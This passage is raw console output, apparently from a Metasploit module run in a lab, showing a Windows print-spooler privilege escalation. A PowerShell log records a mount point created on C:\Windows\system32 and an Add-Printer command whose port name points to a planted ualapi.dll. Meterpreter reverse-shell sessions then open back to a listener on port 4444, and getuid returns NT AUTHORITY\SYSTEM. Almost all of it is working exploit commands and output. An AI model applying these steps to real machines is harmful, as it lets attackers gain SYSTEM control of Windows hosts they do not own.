C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll</S><B N="NoNewLine">false</B><S N="ForegroundColor">DarkYellow</S><S N="BackgroundColor">DarkMagenta</S></Props></Obj><S N="Source">Write-Host</S><DT N="TimeGenerated">2020-11-13T23:59:01.4597769-08:00</DT><Obj N="Tags" RefId="9"><TN RefId="3"><T>System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</T><T>System.Object</T></TN><LST><S>PSHOST</S></LST></Obj><S N="User">DESKTOP-CL5L2IH\msfuser</S><S N="Computer">DESKTOP-CL5L2IH</S><U32 N="ProcessId">5972</U32><U32 N="NativeThreadId">6992</U32><U32 N="ManagedThreadId">8</U32></Props></Obj><Obj S="information" RefId="10"><TNRef RefId="1" /><ToString>[+] Mount point created successfully on C:\Windows\system32</ToString><Props><Obj N="MessageData" RefId="11"><TNRef RefId="2" /><ToString>[+] Mount point created successfully on C:\Windows\system32</ToString><Props><S N="Message">[+] Mount point created successfully on C:\Windows\system32</S><B N="NoNewLine">false</B><S N="ForegroundColor">DarkYellow</S><S N="BackgroundColor">DarkMagenta</S></Props></Obj><S N="Source">Write-Host</S><DT N="TimeGenerated">2020-11-13T23:59:01.4910252-08:00</DT><Obj N="Tags" RefId="12"><TNRef RefId="3" /><LST><S>PSHOST</S></LST></Obj><S N="User">DESKTOP-CL5L2IH\msfuser</S><S N="Computer">DESKTOP-CL5L2IH</S><U32 N="ProcessId">5972</U32><U32 N="NativeThreadId">6992</U32><U32 N="ManagedThreadId">8</U32></Props></Obj><Obj S="progress" RefId="13"><TNRef RefId="0" /><MS><I64 N="SourceId">8</I64><PR N="Record"><AV>Add-Printer -Name "ZVRhh" -DriverName "Generic / Text Only" -PortName "C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll" | Out-Null</AV><AI>1217475551</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj></Objs>
[*] 192.168.132.134 - Meterpreter session 3 closed.  Reason: Died
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 4 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-12-16 13:54:49 -0600

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

```
